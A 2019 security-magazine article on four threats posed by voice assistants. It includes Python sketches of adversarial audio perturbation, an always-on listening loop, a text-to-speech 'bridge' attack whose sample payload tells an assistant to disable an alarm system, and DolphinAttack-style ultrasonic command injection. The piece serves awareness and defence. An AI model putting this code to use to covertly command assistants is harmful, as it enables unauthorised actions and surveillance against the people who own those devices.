
4 Security Threats of Voice Assistants That CIOs Need to Worry About

By Enterprise Security Magazine | Friday, September 27, 2019

Voice assistants have undoubtedly made life easier by providing the convenience of hands-free control. However, concerns are mounting about the threats posed by these digital assistants.

FREMONT, CA: Voice assistants are digital assistants that use voice recognition, natural language processing, and speech synthesis to serve users through mobile devices and voice-enabled applications.

Voice assistants typically help users with tasks such as playing music, making reservations, and playing audiobooks.

Artificial Intelligence (AI), voice recognition, and machine learning form the foundation of voice assistants. As the end user interacts with a voice assistant, its AI uses algorithms to learn from the input data and becomes better at understanding and predicting the user's requirements.

However, users of voice assistants increasingly face security issues. The following are four ways in which voice assistants can be misused in attacks.

1. Hidden commands in the audio

Among malicious attacks against machine-learning systems is a class known as adversarial examples: the attacker subtly alters an input, such as an audio clip for a voice system or an image for a vision system, so that the machine misinterprets it even though a human can barely detect any difference.

Carlini, a research scientist at UC Berkeley, used this technique in his research to alter an audio clip into a nearly identical clip that transcribes into an entirely different phrase. The technique is capable of hiding commands inside music.
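Below is a minimal sketch of the idea in Python, assuming a hypothetical differentiable speech-to-text model (`model`) that returns per-frame character scores; Carlini's actual attack targeted Mozilla's DeepSpeech through a CTC loss, but the gradient-descent structure is the same.

```python
# Sketch of a gradient-based adversarial audio perturbation.
# "model" is a hypothetical stand-in for a differentiable
# speech-to-text network; eps bounds the perturbation so the
# altered clip still sounds like the original to a human.
import torch

def adversarial_audio(model, audio, target_labels, eps=0.05, steps=100, lr=1e-3):
    """Find a small delta so that model(audio + delta) decodes to the target."""
    delta = torch.zeros_like(audio, requires_grad=True)
    opt = torch.optim.Adam([delta], lr=lr)
    for _ in range(steps):
        logits = model(audio + delta)        # assumed (frames, classes) scores
        loss = torch.nn.functional.cross_entropy(logits, target_labels)
        opt.zero_grad()
        loss.backward()
        opt.step()
        with torch.no_grad():                # keep the perturbation quiet
            delta.clamp_(-eps, eps)
    return (audio + delta).detach()
```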

2. It is still active

Voice assistants keep listening even when no commands are being given. Like mobile devices, they are equipped with sensors that capture a great deal of detail about the user. Once a device hears its wake word, it streams the audio to the cloud, effectively making it a listening bug at the user's location by design. The user's privacy is thus exposed inadvertently and becomes vulnerable to malicious attacks.
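To see why, consider a minimal sketch of an always-on listening loop. Here `read_audio_frame`, `detect_wake_word`, and `send_to_cloud` are hypothetical placeholders for the microphone driver, the on-device wake-word model, and the cloud uplink.

```python
# Sketch of an always-on listener: the microphone never closes,
# and a ring buffer even preserves audio from *before* the wake word.
import collections

FRAME_SECONDS = 0.5
PRE_ROLL_FRAMES = 4            # frames kept from before the wake word

def listen_forever(read_audio_frame, detect_wake_word, send_to_cloud):
    ring = collections.deque(maxlen=PRE_ROLL_FRAMES)
    while True:
        frame = read_audio_frame(FRAME_SECONDS)   # mic is always open
        ring.append(frame)
        if detect_wake_word(frame):
            # Everything around the wake word leaves the premises
            # and is processed server-side.
            send_to_cloud(list(ring))
```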

3. Shifting from one device to another

Fraudsters generally find their way into companies and homes through a router or an unsecured wireless network. Voice assistants give them another avenue: an attacker can bridge into a household or office by using any nearby audio device to issue commands to the assistant. The dollhouse incident, in which a TV broadcast of the phrase "Alexa, order me a dollhouse" inadvertently triggered viewers' devices, can be taken as an accidental version of this attack.
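A rough sketch of the bridging idea, using the pyttsx3 text-to-speech library: any compromised device with a speaker can "talk" to an assistant within earshot. The wake phrase and command here are purely illustrative.

```python
# Sketch of an audio bridge attack: a compromised laptop, TV, or
# smart speaker plays a synthesized voice command out loud.
import pyttsx3

def speak_command(command: str) -> None:
    engine = pyttsx3.init()
    engine.setProperty("rate", 150)   # speak slowly enough to be parsed
    engine.say(command)               # any nearby assistant will hear this
    engine.runAndWait()

# Illustrative payload; real attacks would target whatever the
# assistant is allowed to control on the local network.
speak_command("Hey assistant, disable the alarm system.")
```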

4. Machines can hear what users can't

Masking commands inside other audio is not the only way to covertly manipulate voice assistants. In 2017, six researchers from Zhejiang University demonstrated that sounds inaudible to humans could command Siri to make calls or perform other actions.

The famous DolphinAttack shows the consequences of this lack of security: a voice assistant can be silently commanded to visit a malicious site, inject fake information, spy on the user, and more.
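Below is a minimal sketch of the signal-processing idea behind DolphinAttack: a recorded voice command is amplitude-modulated onto an ultrasonic carrier. Nonlinearities in the microphone hardware demodulate the envelope back into the audible band, while humans standing nearby hear nothing. The carrier frequency and sample rate are illustrative values; `voice` is assumed to be a recorded command as a NumPy array.

```python
# Sketch of ultrasonic amplitude modulation in the style of DolphinAttack.
import numpy as np

def modulate_ultrasonic(voice: np.ndarray, sample_rate: int = 192_000,
                        carrier_hz: float = 30_000.0) -> np.ndarray:
    """Return an AM signal whose envelope is the voice command."""
    t = np.arange(len(voice)) / sample_rate
    carrier = np.cos(2 * np.pi * carrier_hz * t)
    # Standard AM: carrier * (1 + normalized voice). The 30 kHz carrier
    # sits above human hearing; the mic's nonlinearity recovers the envelope.
    return carrier * (1.0 + voice / np.max(np.abs(voice)))
```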

There is no doubt that installing voice assistants in homes or offices is beneficial. However, they come with serious security consequences that need to be taken care of.
